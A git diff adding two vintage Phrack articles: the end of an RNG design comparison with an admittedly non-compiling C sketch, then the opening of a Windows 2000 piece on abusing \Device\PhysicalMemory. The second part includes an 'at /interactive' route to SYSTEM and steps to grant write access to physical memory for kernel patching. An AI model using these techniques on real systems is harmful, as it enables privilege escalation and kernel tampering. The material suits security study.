+randomness (FIPS 140-1)." I find it reassuring that a company (CRI) has
+analyzed and is supporting this RNG. That isn't something you see very
+often. On the other hand FIPS140-1 is just another hype generator. After
+reading FIPS140-1, one realises it has absolutely NOTHING to do with the
+quality of the RNG, but hey! Who cares? Microsoft seems to think it's good
+enough to use in their family of _high_quality_and_security_ products, so
+it must be great. All kidding asside, despite the corporate stench, this
+RNG is well designed and will prevent many RNG blunders such as Netscape's.
+I think this is a step in the right direction. Rather than letting Joe,
+Timmy his cousin, and Timmy's best friend's friend design their own RNGs,
+they provide a good solution for everyone without having them trip on their
+own feet like Netscape did.
+
+
+2.2.1) Intel RNG Entropy Gathering
+
+Intel's Random Number Generator is to be integrated into PC motherboards.
+There are 2 resistors and 2 oscillators (one slow, the other fast). The
+voltage difference between the 2 resistors is amplified to sample thermal
+noise. This noise source is used to modulate the slow clock. This clock
+with variable modulation is used to set intervals between measurements of
+the fast clock. When the interval is triggered the frequency of the fast
+clock is then filtered through what Intel calls the von Neumann corrector
+(patent pending). The corrector compensates for the fast clocks bias
+towards staying in fixed bit states (regardless of the slow clock's
+variable modulation). It works by comparring pairs of bits and outputing
+only one or no bits ([1,0]=0; [0,1]=1; [0,0]or[1,1]=no output;). The
+output of the corrector is grouped in 32bit blocks and sent to the Intel
+Security Driver.
+
+
+2.2.2) Intel RNG Entropy Estimation
+
+No estimations are done for a few reasons. Because the entropy source is
+hardware based, it cannot be manipulated unless it is put into temperatures
+far beyond or bellow resonable ambient conditions, or the computer's power
+is cut off (in which case the entropy gathering stops). Beyond that, all
+entropy is gathered in the same way and can be assumed of identical
+quality.
+
+
+2.2.3) Intel RNG Entropy Pool
+
+The Intel Security Driver takes care of mixing the RNG's output. The pool
+is composed of 512bits of an SHA-1 hash contexts divided into two states.
+An 80bit hash of the first state is generated and appended with 32 bits of
+entropy (from the hardware) and the first 160bits from the first state to
+create the second state. When another 32bits of entropy are generated, the
+second state becomes the first state and the same process is repeated.
+
+
+2.2.4) Intel RNG Output Function
+
+The last 16bits of the 80bit hash of the first state are output to the
+middleware. The Intel Security Driver ensures that each output is
+dispatched only once. If desired, additional processing of the output will
+have to be done by the program that requested the random data.
+
+
+2.2.5) Intel RNG Analysis
+
+[1] The need to implement the von Neumann corrector is demonstration of
+the RNG's affinity for repetitive sequences. An attacker could calculate
+when 1s or 0s are disproportionatly output by estimating it's throughput
+in bits/sec, but this doesn't lead to any feasable attacks (yet).
+
+[2] The use of contracted middleware may lead to security holes. Before
+using a company's middleware, you may want to wait a few months just to
+see if a quick break is released.
+
+
+2.3) Linux' /dev/random's Design
+Information Source: /dev/random source code *2
+
+
+2.3.0) /dev/random Overview
+
+Linux provides the /dev/random character device as an interface for
+applications to recieve random data with good quality entropy. It provides
+a gernourously sized entropy pool (512 bytes) to accomodate the operating
+system and all software running on it. When quality entropy is not
+necessary, a second character device /dev/urandom is provided as a PRNG to
+avoid wastefully depleting /dev/random's entropy pool.
+
+
+2.3.1) /dev/random Entropy Gathering
+
+External functions from the kernel trigger the addition of entropy into the
+pool. Events that trigger this are key presses, mouse movement, and IRQs.
+Uppon each trigger, 32bits of a high-frequency timer are copied, and
+another 32bits are derrived depending on the type of trigger (either the
+mouse coordinates, keybaord scancode, or IRQ number).
+
+
+2.3.2) /dev/random Entropy Estimation
+
+Entropy estimation is calculated with the help of three deltas. Delta1 is
+the time elapsed since the last trigger of its type occured. Delta2 is the
+difference between Delta1 and the previous Delta1. Delta3 is the difference
+between Delta2 and the previous Delta2. The smallest of the three deltas
+calculated is chosen as Delta. The least significant bit of Delta is
+ignored and the next 12bits are used to increment the entropy counter.
+
+
+2.3.3) /dev/random Entropy Pool
+
+This RNG uses an entropy pool of 4096bits. Prior to input, a marker
+denoting the current position along the pool is decremented by 2 32bit
+words. If the position is 0, the position is wrapped around backwards to
+the second last 32bit word. Entropy is added in two 32bit words: x & y. A
+variable, j determines how many bits to the left the entropy should be
+rotated. Before entropy is added, j is incremented by 14 (7 if the pool is
+in position 0). Entropy is rotated by j. Depending on the current position
+along the pool, y is XORed with 5 other fixed portions of the pool (the
+following positions are wrapped around from the current position: 103,76,
+51,25,1 (for a 4096bit pool) and x is XORed with each next word. x is
+shifted to the right 3bits, XORed by a constant within a 1x7 table (0,
+0x3b6e20c8, 0x76dc4190, 0x4db26158, 0xedb88320, 0xd6d6a3e8, 0x9b64c2b0,
+0xa00ae278) the index of which is chosen by x AND 7 (bitwise, 3bits). x
+XOR y is then appended to the pool skipping one word. y is shifted to the
+right 3bits, XORed with the constant table the same way x was and then
+copied into the word that was skipped in the pool. The pool remains at
+this position (previous position - 2, possibly wrapped around the end).
+
+
+2.3.4) /dev/random Output Function
+
+When output is requested from the RNG, the timer and the number of bytes
+requested is added to the pool as entropy. The pool is then hashed with
+SHA-1 and the first 2 words of the hash are fed as entropy into the pool;
+this is repeated 8 times, but each time the next 2 words of the hash are
+fed into the pool. The first half of the final hash is then XORed to its
+second half to produce the output. The output is either the requested size
+or 20 bytes (half the hash size); the smallest of these is chosen.
+
+
+2.3.5) Linux' /dev/random Analysis
+
+[1] Monitoring and predicting of some IRQs is possible in a networked
+environment.
+
+[2] There is allot of redundancy in the lower 16bits of the entropy added.
+For example, when a keypress occurs a 32bit variable holds 16bits from a
+high-resolution timer, and the lower 16 bits are 0-255 for the keypress
+(256+ are used to designate interupts). This leaves 8bits of redundancy
+for every keypress.
+
+[3] The time elapsed since the last block of entropy was added is usually
+irrelevent to the quality of the entropy, unless that lapse is very short.
+This doesn't take into account sequencial entropy entries like continuous
+disk access while moving a file.
+
+[4] When output occurs, the mixing mechanism re-enters allot of hashed
+entropy which may or may not be of good quality. These re-entered words
+are added to the entropy count but should not. They are bits of entropy
+that have already been counted. After output, 512bits of entropy are
+redundantly entered. If this estimate is accurate, then after 8 calls to
+output there are 4096bits (the entire pool) of entropy of undifinable
+quality. Under these circumstances, if no entropy is input from
+user-interacting during the calls, the RNG becomes a PRNG.
+
+
+
+2.4) Yarrow's Design
+information sources: Yarrow source code and White Papers *3,*4
+
+
+2.4.0) Yarrow Overview
+
+Yarrow is designed by Bruce Schneier, auther of Applied Cryptography and
+designer of block ciphers Blowfish and AES finalist Twofish. Yarrow is
+Schneier's interpretation of the proper design of an RNG and is accompanied
+by a detailed paper descibing its inner-workings and analysis (see the
+second information source). It is the product of lengthy research and sets
+standard in properties expected to be found in a secure RNG. It is
+discussed here for comparisson between commonly trusted RNGs and one
+designed by a seasoned proffessional.
+
+2.4.1) Yarrow Entropy Gathering
+
+System hooks wait for keyboard or mouse events. If a key has been pressed,
+the time elapsed since the last key-press is appended to an array. The same
+is done when a mouse button has been pressed. If the mouse has moved, the
+x and y coordinates are appended to a mouse movement array. Once an array
+is full is is passed to the entropy estimation function.
+
+
+2.4.2) Yarrow Entropy Estimation
+
+The entropy estimation function is passed an estimated number of bits of
+entropy chosen by the programmer's bias towards it's source. One could
+decide that that mouse movement only represents 4 bits of entropy per
+movement, while keyboard latency is worth 8bits per key-press. Another
+measurement uses a small compression algorithm and measures the compressed
+size. The third and last measurement is half the size of the entropy
+sample. The smallest of these three measurements increments the entropy
+estimate.
+
+
+2.4.3) Yarrow Entropy Pool
+
+When entropy is input, it is fed into a fast pool (SHA-1 context) and an
+entropy estimate is updated for that pool. Once the pool has accumulated
+100bits of entropy, the hash output of this pool is fed into the slow pool
+and its entropy estimate is updated. When the slow pool has accumulated
+160bits of entropy it's hash output becomes the current key.
+
+
+2.4.4) Yarrow Output Function
+
+When output is required, the current key (derived from the slow pool)
+encrypts a counter (its number of bits is chosen by the programmer) and
+outputs the ciphertext; the counter is then incremented. After 10 outputs,
+the RNG reseeds the key by replacing it with another (forced) output. The
+key will next be reseeded either when the slow pool has accumulated 160bits
+or 10 outputs have occured.
+
+
+2.4.5) Yarrow Analysis
+
+[1] Mouse movement on its own is very redundant, there is a very limited
+range of motion between the last postion and the current position after
+the OS has sent the message that the mouse has moved. Most of the bits
+representing the mouse's position are unlikely to change and throw-off the
+entropy estimates in this RNG.
+
+
+[2] Even though the pool's internal state is 320+n+kbits long, there is a
+maximum of 160bits of entropy during any state. "Yarrow-160, our current
+construction, is limited to at most 160 bits of security by the size of
+its entropy accumulation pools." *4
+
+
+
+----| 3) NoiseSpunge Source Code
+
+The Following source code is simply a brief example. Do whatever you want
+with it; even that thing you do with your tongue and the rubber ... never
+mind. It _WILL_NOT_COMPILE_ because about 1,200 lines have been omitted,
+consisting of Haval, Rijndael and the PRNG). Haval and Rijndael source
+code is readily available. Any PRNG will do, but make sure it works with
+32bit inputs and outputs and has a period of at least 2^32 (4294967296).
+I've devided it into 3 chunks: entropy gathering, entropy pool, output
+functions.
+
+[ENTROPY GATHERING]
+
+This loop must run on a thread independent of the application's main
+thread. For OS dependancies, I've created dummy functions that should be
+replaced:
+
+int64 CounterFreq; //high-res counter's frequency/second
+int64 QueryCounter; //high-res counter's current value
+Delay(int ms); //1 milisecond precision delay
+int GetMouseX; //current mouse x coordinate
+int GetMouseY; // " y coordinate
+
+#define MOUSE_INTERVAL 10
+
+{
+ Prng_CTX PCtx;
+ int x,y;
+ unsigned long Block;
+ unsigned long BitsGathered;
+ int65 Interval,Frequency,ThisTime,LastTime;
+
+ unsigned long BitsGathered=0;
+ bool Idled=false;
+ Frequency=CounterFreq;
+ bool Terminated=false; //Set value to true to end the loop
+ do
+ {
+    if (Idled==false)
+    {
+       Delay(MOUSE_INTERVAL);
+       Idled=true;
+    }
+    ThisTime=QueryCounter;
+    if ((ThisTime-LastTime)>Interval)
+    {
+       if ((x!=GetMouseX)&&(y!=GetMouseY)
+       {
+          x=mouse.cursorpos.x;
+          y=mouse.cursorpos.y;
+          Block|=((x^y^ThisTime)& 15)<<BitsGathered;
+          BitsGathered+=4;
+          if (BitsGathered==32)
+          {
+             PrngInit(&PCtx,Block);
+             AddEntropy(Block); //this function is defined lower
+             Block=0;
+             BitsGathered=0;
+          }
+          Interval=((((Prng(@PCtx)%MOUSE_INTERVAL)>>2)+MOUSE_INTERVAL)
+             * Frequency)/1000;
+       }
+       LastTime=QueryCounter;
+       Idled=false;
+    }
+ } while (Terminated==false);
+}
+
+[ENTROPY POOL]
+
+#define SEED_SIZE 8
+#define PRIMARY_RESEED 8
+#define SECONDARY_RESEED 8
+
+//parameters
+#define MAX_KEY_RESERVE 8
+#define KEY_BUILD_ROUNDS 16
+
+typedef unsigned long Key256[SEED_SIZE];
+
+Key256 Seed;
+Key256 EntropyBuffer;
+Haval_CTX PrimaryPool;
+Haval_CTX SecondaryPool;
+unsigned char PrimaryReseedCount;
+unsigned char EntropyCount;
+unsigned char KeyReserve;
+
+//FUNCTIONS
+void NoiseSpungeInit
+{
+ HavalInit(&PrimaryPool);
+ HavalInit(&SecondaryPool);
+ for (int i=0;i<8;i++) Seed[i]=0;
+ EntropyCount=0;
+ PrimaryReseedCount=0;
+ KeyReserve=0;
+}
+
+void PermuteSeed
+{
+ Key256 TempBuffer[2];
+ Prng_CTX PCtx;
+ Haval_CTX HCtx;
+
+ for (int i=0;i<SEED_SIZE;i++) //expand
+ {
+    PrngInit(&PCtx,Seed[i]);
+    TempBuffer[0][i]=Prng(&PCtx);
+    TempBuffer[1][i]=Prng(&PCtx);
+ }
+
+ HavalInit(&HCtx);
+ HavalUpdate(&HCtx,&TempBuffer,64); //compress
+ HavalOutput(&HCtx,&Seed);
+}
+
+void PrimaryReseed
+{
+ Key256 TempSeed;
+ HavalUpdate(&PrimaryPool,&EntropyBuffer,32);
+
+ if (PrimaryReseedCount<SECONDARY_RESEED)
+ {
+    HavalOutput(&PrimaryPool,&TempSeed);
+    for (int i=0;i<SEED_SIZE;i++) Seed[i]^=TempSeed[i];
+    PrimaryReseedCount++;
+ } else SecondaryReseed;
+
+ for (int i=0;i<SEED_SIZE;i++) EntropyBuffer[i]=0;
+ if (KeyReserve<MAX_KEY_RESERVE) KeyReserve++;
+ EntropyCount=0;
+}
+
+void SecondaryReseed
+{
+ HavalOutput(&PrimaryPool,&Seed);
+ HavalUpdate(&SecondaryPool,&Seed,32);
+ HavalOutput(&SecondaryPool,&Seed);
+ PermuteSeed;
+ HavalInit(&PrimaryPool);
+ PrimaryReseedCount=0;
+}
+
+void AddEntropy(unsigned long Block)
+{
+ EntropyBuffer[EntropyCount++]=Block;
+ if (EntropyCount==PRIMARY_RESEED) PrimaryReseed;
+}
+
+[OUTPUT FUNCTIONS]
+
+int SafeGetKey(Key256 *Key)
+{
+ Key256 TempSeed;
+ Key256 TempBuffer[2];
+ Rijndael_CTX RCtx;
+ Prng_CTX PCtx;
+ Haval_CTX HCtx;
+
+ if (KeyReserve==0) Return 0;
+
+ for (int i=0;i<SEED_SIZE;i++) TempSeed[i]=Seed[i];
+ PermuteSeed;
+ RijndaelInit(&RCtx,&Seed);
+ for (int i=0;i<KEY_BUILD_ROUNDS;i++)
+ {
+    RijndaelEncrypt(&RCtx,&TempSeed[0]); //encrypt
+    RijndaelEncrypt(&RCtx,&TempSeed[4]);
+    for (int j=0;j<SEED_SIZE;j++) //expand
+    {
+       PrngInit(&pctx,TempSeed[j]);
+       TempBuffer[0,j]=Prng(&PCtx);
+       TempBuffer[1,j]=Prng(&PCtx);
+    }
+    HavalInit(&HCtx);
+    HavalUpdate(&HCtx,&TempBuffer,64);
+    HavalOutput(&HCtx,&TempSeed);
+ }
+ for (int i=0;i<SEED_SIZE;i++) Key[i]=TempSeed[i];
+ if (KeyReserve>0) KeyReserve--;
+ Return 1;
+}
+
+void ForcedGetKey(Key256 *Key)
+{
+ Key256 TempSeed;
+ Key256 TempBuffer[2];
+ Rijndael_CTX RCtx;
+ Prng_CTX PCtx;
+ Haval_CTX HCtx;
+
+ for (int i=0;i<SEED_SIZE;i++) TempSeed[i]=Seed[i];
+ PermuteSeed;
+ RijndaelInit(&RCtx,&Seed);
+ for (int i=0;i<KEY_BUILD_ROUNDS;i++)
+ {
+    RijndaelEncrypt(&RCtx,&TempSeed[0]); //encrypt
+    RijndaelEncrypt(&RCtx,&TempSeed[4]);
+    for (int j=0;j<SEED_SIZE;j++) //expand
+    {
+       PrngInit(&pctx,TempSeed[j]);
+       TempBuffer[0,j]=Prng(&PCtx);
+       TempBuffer[1,j]=Prng(&PCtx);
+    }
+    HavalInit(&HCtx);
+    HavalUpdate(&HCtx,&TempBuffer,64);
+    HavalOutput(&HCtx,&TempSeed);
+ }
+ for (int i=0;i<SEED_SIZE;i++) Key[i]=TempSeed[i];
+ if (KeyReserve>0) KeyReserve--;
+}
+
+
+
+----| 4) References
+
+*1 Intel Random Number Generator White Paper
+  http://developer.intel.com/design/security/rng/CRIwp.htm
+
+*2 /dev/random source code
+  http://www.openpgp.net/random/
+
+*3 Yarrow source code
+  http://www.counterpane.com/Yarrow0.8.71.zip
+
+*4 Yarrow-160: Notes on the Design and Analysis of the Yarrow
+  Cryptographic Pseudorandom Number Generator
+  http://www.counterpane.com/yarrow-notes.html
+
+
diff --git a/phrack59/16.txt b/phrack59/16.txt
new file mode 100644
index 0000000..bbc3472
--- /dev/null
+++ b/phrack59/16.txt
@@ -0,0 +1,1932 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3b, Phile #0x10 of 0x12
+
+|=----------------=[ Playing with Windows /dev/(k)mem ]=-----------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[ crazylord <crazylord@minithins.net> ]=---------------=|
+
+
+1 - Introduction
+
+2 - Introduction to Windows Objects
+  2.1 What are they ?
+  2.2 Their structure
+  2.3 Objects manipulation
+  
+3 - Introduction to \Device\PhysicalMemory
+  3.1 The object
+  3.2 Need writing access ?
+  
+4 - Having fun with \Device\PhysicalMemory
+  4.1 Reading/Writing to memory
+  4.3 What's a Callgate ?
+  4.4 Running ring0 code without the use of Driver
+  4.2 Deeper into Process listing
+  4.5 Bonus Track
+  
+5 - Sample code
+   5.1 kmem.h
+   5.2 chmod_mem.c
+   5.3 winkdump.c
+   5.2 winkps.c
+   5.4 fun_with_ipd.c
+
+6 - Conclusion
+
+7 - References
+
+
+
+
+--[ 1 - Introduction
+
+This papers covers an approch to Windows /dev/kmem linux like object. My 
+research has been done on a Windows 2000 professional version that means 
+that most of the code supplied with the article should work with all 
+Windows 2000 version and is supposed to work with Windows XP with little 
+code modification.
+Windows 9x/Me are clearly not supported as they are not based on the same 
+kernel architecture.
+
+
+--[ 2 - Introduction to Windows Objects
+
+Windows 2000 implements an object models to provide a way of easy 
+manipulating the most basic elements of the kernel. We will briefly see in 
+this chapter what are these objects and how we can manipulate them.
+
+
+----[ 2.1 What are they ?
+
+According to Microsoft, the object manager was designed to meet these goals
+   * use named object for easy recognition
+   * support POSIX subsystem
+   * provide a easy way for manipulating system resources
+   * provide a charge mechanism to limit resource used by a process
+   * be C2 security compliant :) (C2: Controlled Access Protection)
+
+There are 27 differents objects types:
+
+   * Adapter       * File             * Semaphore
+   * Callback      * IoCompletion     * SymbolicLink
+   * Controler     * Job              * Thread
+   * Desktop       * Key              * Timer
+   * Device        * Mutant           * Token
+   * Directory     * Port             * Type
+   * Driver        * Process          * WaitablePort
+   * Event         * Profile          * WindowStation
+   * EventPair     * Section          * WmiGuid
+
+Most of these names are explicit enough to understand what's they are 
+about. I will just explain some obscure names:
+   * an EventPair is just a couple of 2 Event objects.
+   * a Mutant also called Mutex is a synchronization mechanism for resource
+     access.
+   * a Port is used by the LPC (Local Procedure Call) for Inter-Processus 
+     Communication.
+   * a Section (file mapping) is a region of shared memory.
+   * a Semaphore is a counter that limit access to a resource.
+   * a Token (Access Token) is the security profile of an object.
+   * a WindowStation is a container object for desktop objects.
+
+Objects are organised into a directory structure which looks like this:
+
+   - \
+     - ArcName                 (symbolic links to harddisk partitions)
+     - NLS                     (sections ...)
+     - Driver                  (installed drivers)
+     - WmiGuid
+     - Device                  (/dev linux like)
+       - DmControl
+         - RawDmVolumes
+       - HarddiskDmVolumes
+         - PhysicalDmVolumes
+     - Windows
+       - WindowStations
+     - RPC Control
+     - BaseNamedObjects
+       - Restricted
+     - ??                      (current user directory)
+     - FileSystem              (information about installable files system)
+     - ObjectTypes             (contains all avaible object types)
+     - Security
+     - Callback
+     - KnownDlls               (Contains sections of most used DLL)
+
+The "??" directory is the directory for the current user and "Device" could
+be assimiled as the "/dev" directory on Linux. You can explore these 
+structures using WinObj downloadable on Sysinternals web sites (see [1]).
+
+
+----[ 2.2 Their structure
+
+Each object is composed of 2 parts: the object header and the object body.
+Sven B. Schreiber defined most of the non-documented header related 
+structures in his book "Windows 2000 Undocumented Secrets". Let's see the
+header structure.
+
+---
+from w2k_def.h:
+
+typedef struct _OBJECT_HEADER {
+/*000*/ DWORD        PointerCount;       // number of references
+/*004*/ DWORD        HandleCount;        // number of open handles
+/*008*/ POBJECT_TYPE ObjectType;         // pointer to object type struct
+/*00C*/ BYTE         NameOffset;         // OBJECT_NAME offset
+/*00D*/ BYTE         HandleDBOffset;     // OBJECT_HANDLE_DB offset
+/*00E*/ BYTE         QuotaChargesOffset; // OBJECT_QUOTA_CHARGES offset
+/*00F*/ BYTE         ObjectFlags;        // OB_FLAG_*
+/*010*/ union
+        { // OB_FLAG_CREATE_INFO ? ObjectCreateInfo : QuotaBlock
+/*010*/    PQUOTA_BLOCK        QuotaBlock;
+/*010*/    POBJECT_CREATE_INFO ObjectCreateInfo;
+        };
+/*014*/ PSECURITY_DESCRIPTOR SecurityDescriptor;
+/*018*/ } OBJECT_HEADER, *POBJECT_HEADER;
+---
+
+Each offset in the header are negative offset so if you want to find the 
+OBJECT_NAME structure from the header structure, you calculate it by doing:
+             address = object_header_address - name_offset
+
+OBJECT_NAME structure allows the creator to make the object visible to 
+other processes by giving it a name.
+OBJECT_HANDLE_DB structure allows the kernel to track who is currently 
+using this object.
+OBJECT_QUOTA_CHARGES structure defines the resource charges levied against 
+a process when accessing this object.
+The OBJECT_TYPE structure stocks global informations about the object type 
+like default security access, size of the object, default charge levied to 
+process using an object of this type, ...
+
+A security descriptor is bound to the object so the kernel can restrict 
+access to the object.
+
+Each object type have internal routines quite similar to C++ object 
+constructors and destructors:
+   * dump method       - maybe for debugging purpose (always NULL)
+   * open method       - called when an object handle is opened
+   * close method      - called when an object handle is closed
+   * delete method     - called when an object is deleted
+   * parse method      - called when searching an object in a list of              
+                         object
+   * security method   - called when reading/writing a protection for the 
+                         current object
+   * query name method - called when a thread request the name of the         
+                         object
+   * "ok to close"     - called when a thread is closing a handle
+
+The object body structure totally depends on the object type.
+A very few object body structure are documented in the DDK. If you are
+interested in these structures you may google :) or take a look at 
+chapeaux-noirs home page in the kernel_reversing section (see [4]).
+
+
+---- [ 2.3 Object manipulation
+
+On the user-mode point of view, objects manipulation is done through the 
+standart Windows API. For example, in order to access a file object you can
+use fopen()/open() which will call CreateFile(). At this point, we switch 
+to kernel-mode (NtCreateFile()) which call IoCreateFile() in ntoskrnl.exe.
+As you can see, we still don't know we are manipulating an "object".
+By disassembling IoCreateFile(), you will see some function like 
+ObOpenObjectByName, ObfDereferenceObject, ...
+
+(By the way you will only see such functions if you have win2k symbols
+downloadable on Microsoft DDK web site (see [2]) and disassemblingbwith a
+disassembler supporting Windows Symbols files like IDA/kd/Softicevbecause
+these functions are not exported.)
+
+Each function's name begining with "Ob" is related to the Object Manager.
+So basically, a standart developper don't have to deal with object but we
+want to.
+
+All the object manager related function for user-mode are exported by 
+ntdll.dll. Here are some examples:
+NtCreateDirectoryObject, NtCreateSymbolicLinkObject, NtDuplicateObject,
+NtMakeTemporaryObject, NtOpenDirectoryObject, ...
+Some of these functions are documented in the MSDN some (most ?) are not.
+
+If you really want to understand the way object works you should better
+take a look at the exported function of ntoskrnl.exe beginning with "Ob".
+21 functions exported and 6 documented =]
+
+If you want the prototypes of the 15 others, go on the ntifs.h home page
+(see [3]) or to chapeaux-noirs web site (see [4]).
+
+
+--[ 3 - Introduction to \Device\PhysicalMemory
+
+As far as i know, \Device\PhysicalMemory object was discovered by 
+Mark Russinovich from Sysinternals (see [1]). He coded the first code using
+it : Physmem avaible on his site. Enough greeting :), now we will try to 
+understand what is this object used for and what we can do with it.
+
+
+----[ 3.1 - the object
+
+In order to look at the object information, we are going to need a tool 
+like the Microsoft Kernel Debugger avaible in the Microsoft DDK (see [2]).
+Ok let's start working ...
+
+Microsoft(R) Windows 2000 Kernel Debugger
+Version 5.00.2184.1
+Copyright (C) Microsoft Corp. 1981-1999
+
+Symbol search path is: c:\winnt\symbols
+
+Loading Dump File [livekd.dmp]
+Full Kernel Dump File
+
+Kernel Version 2195 UP Free
+Kernel base = 0x80400000 PsLoadedModuleList = 0x8046a4c0
+Loaded kdextx86 extension DLL
+Loaded userkdx extension DLL
+Loaded dbghelp extension DLL
+f1919231 eb30             jmp     f1919263
+kd> !object \Device\PhysicalMemory
+!object \Device\PhysicalMemory
+Object: e1001240  Type: (fd038880) Section
+    ObjectHeader: e1001228
+    HandleCount: 0  PointerCount: 3
+    Directory Object: fd038970  Name: PhysicalMemory
+    
+The basic object parser from kd (kernel debugger) tells us some information
+about it. No need to explain all of these field means, most of them are 
+explicit enough if you have readen the article from the beginning if not 
+"jmp dword Introduction_to_Windows_Objects".
+Ok the interesting thing is that it's a Section type object so that 
+clearly mean that we are going to deal with some memory related toy.
+
+Now let's dump the object's header structure.
+kd> dd e1001228 L 6
+dd e1001228 L 6
+e1001228  00000003 00000000 fd038880 12200010
+e1001238  00000001 e1008bf8
+
+details:
+--> 00000003 : PointerCount = 3
+--> 00000000 : HandleCount  = 0
+--> fd038880 : pointer to object type = 0xfd038880
+--> 12200010 --> 10 : NameOffset
+             --> 00 : HandleDBOffset
+             --> 20 : QuotaChargeOffset
+             --> 12 : ObjectFlags = OB_FLAG_PERMANENT & OB_FLAG_KERNEL_MODE
+--> 00000001 : QuotaBlock
+--> e1008bf8 : SecurityDescriptor           
+
+Ok the NameOffset exists, well no surprise, this object has a name .. but 
+the HandleDBOffset don't. That means that the object doesnt track handle 
+assigned to it. The QuotaChargeOffset isn't really interesting and the 
+ObjectFlags tell us that this object is permanent and has been created by 
+the kernel.
+For now nothing very interesting ...
+
+We dump the object's name structure just to be sure we are not going the
+wrong way :). (Remember that offset are negative).
+
+kd> dd e1001228-10 L3
+dd e1001228-10 L3
+e1001218  fd038970 001c001c e1008ae8
+
+--> fd038970 : pointer to object Directory
+--> 001c001c --> 001c : UNICODE_STRING.Length
+             --> 001c : UNICODE_STRING.MaximumLength
+--> e1008ae8 : UNICODE_STRING.Buffer (pointer to wide char string)
+
+kd> du e1008ae8
+du e1008ae8
+e1008ae8  "PhysicalMemory"
+
+Ok now, let's look at the interesting part, the security descriptor:
+
+kd> !sd e1008bf8
+!sd e1008bf8
+->Revision: 0x1
+->Sbz1    : 0x0
+->Control : 0x8004
+            SE_DACL_PRESENT
+            SE_SELF_RELATIVE
+->Owner   : S-1-5-32-544
+->Group   : S-1-5-18
+->Dacl    :
+->Dacl    : ->AclRevision: 0x2
+->Dacl    : ->Sbz1       : 0x0
+->Dacl    : ->AclSize    : 0x44
+->Dacl    : ->AceCount   : 0x2
+->Dacl    : ->Sbz2       : 0x0
+->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
+->Dacl    : ->Ace[0]: ->AceFlags: 0x0
+->Dacl    : ->Ace[0]: ->AceSize: 0x14
+->Dacl    : ->Ace[0]: ->Mask : 0x000f001f
+->Dacl    : ->Ace[0]: ->SID: S-1-5-18
+
+->Dacl    : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
+->Dacl    : ->Ace[1]: ->AceFlags: 0x0
+->Dacl    : ->Ace[1]: ->AceSize: 0x18
+->Dacl    : ->Ace[1]: ->Mask : 0x0002000d
+->Dacl    : ->Ace[1]: ->SID: S-1-5-32-544
+
+->Sacl    :  is NULL
+
+In other words that means that the \Device\PhysicalMemory object has this 
+following rights:
+
+user SYSTEM: Delete, Change Permissions, Change Owner, Query Data,
+             Query State, Modify State
+user Administrator: Query Data, Query State
+
+So basically, user Administrator as no right to Write here but user 
+SYSTEM do, so that mean that Administrator does too.
+
+You have to notice that in fact THIS IS NOT LIKE /dev/kmem !!
+/dev/kmem maps virtual memory on Linux, \Device\PhysicalMemory maps 
+physical memory, the right title for this article should be "Playing with 
+Windows /dev/mem" as /dev/mem maps physical memory but /dev/kmem sounds
+better and much more wellknown :).
+As far as i know the Section object body structure hasn't been yet reversed 
+as i'm writing the article so we can't analyze it's body.
+
+
+----[ 3.2 need writing access ?
+
+Ok .. we are user administrator and we want to play with our favourite
+Object, what can we do ? As most Windows administrators should know it is
+possible to run any process as user SYSTEM using the schedule service.
+If you want to be sure that you can, just start the schedule with 
+"net start schedule" and then try add a task that launch regedit.exe
+c:\>at <when> /interactive regedit.exe
+After that try to look at the SAM registry key, if you can, you are user 
+SYSTEM otherwise you are still administrator since only user SYSTEM has 
+reading rights.
+
+Ok that's fine if we are user Administrator but what's up if we want to 
+allow somebody/everyone to write to \Device\PhysicalMemory
+(for learning purpose off course).
+We just have to add another ACL (access-control list) to this object.
+To do this you have to follow these steps:
+
+   1) Open a handle to \Device\PhysicalMemory (NtOpenSection)
+   2) Retrieve the security descriptor of it (GetSecurityInfo)
+   3) Add Read/Write authorization to the current ACL (SetEntriesInAcl)
+   4) Update the security descriptor (SetSecurityInfo)
+   5) Close the handle previously opened
+
+see chmod_mem.c sample code.
+
+After having run chmod_mem.exe we dump another time the security descriptor
+ of \Device\PhysicalMemory.
+
+kd> !object \Device\PhysicalMemory
+!object \Device\PhysicalMemory
+Object: e1001240  Type: (fd038880) Section
+    ObjectHeader: e1001228
+    HandleCount: 0  PointerCount: 3
+    Directory Object: fd038970  Name: PhysicalMemory
+kd> dd e1001228+0x14 L1
+dd e1001228+0x14 L1
+e100123c  e226e018
+kd> !sd e226e018
+!sd e226e018
+->Revision: 0x1
+->Sbz1    : 0x0
+->Control : 0x8004
+            SE_DACL_PRESENT
+            SE_SELF_RELATIVE
+->Owner   : S-1-5-32-544
+->Group   : S-1-5-18
+->Dacl    :
+->Dacl    : ->AclRevision: 0x2
+->Dacl    : ->Sbz1       : 0x0
+->Dacl    : ->AclSize    : 0x68
+->Dacl    : ->AceCount   : 0x3
+->Dacl    : ->Sbz2       : 0x0
+->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
+->Dacl    : ->Ace[0]: ->AceFlags: 0x0
+->Dacl    : ->Ace[0]: ->AceSize: 0x24
+->Dacl    : ->Ace[0]: ->Mask : 0x00000002
+->Dacl    : ->Ace[0]: ->SID: S-1-5-21-1935655697-436374069-1060284298-500
+
+->Dacl    : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
+->Dacl    : ->Ace[1]: ->AceFlags: 0x0
+->Dacl    : ->Ace[1]: ->AceSize: 0x14
+->Dacl    : ->Ace[1]: ->Mask : 0x000f001f
+->Dacl    : ->Ace[1]: ->SID: S-1-5-18
+
+->Dacl    : ->Ace[2]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
+->Dacl    : ->Ace[2]: ->AceFlags: 0x0
+->Dacl    : ->Ace[2]: ->AceSize: 0x18
+->Dacl    : ->Ace[2]: ->Mask : 0x0002000d
+->Dacl    : ->Ace[2]: ->SID: S-1-5-32-544
+
+->Sacl    :  is NULL
+
+Our new Ace (access-control entry) is Ace[0] with a 0x00000002
+(SECTION_MAP_WRITE) right.
+For more information about Security win32 API see MSDN ([9]).
+
+
+--[ 4 - Having fun with \Device\PhysicalMemory
+
+Why playing with \Device\PhysicalMemory ? reading, writing, patching memory
+i would say. That should be enough :)
+
+
+----[ 4.1 Reading/Writing to memory
+
+Ok let's start playing...
+In order to read/write to \Device\PhysicalMemory, you have do this way:
+
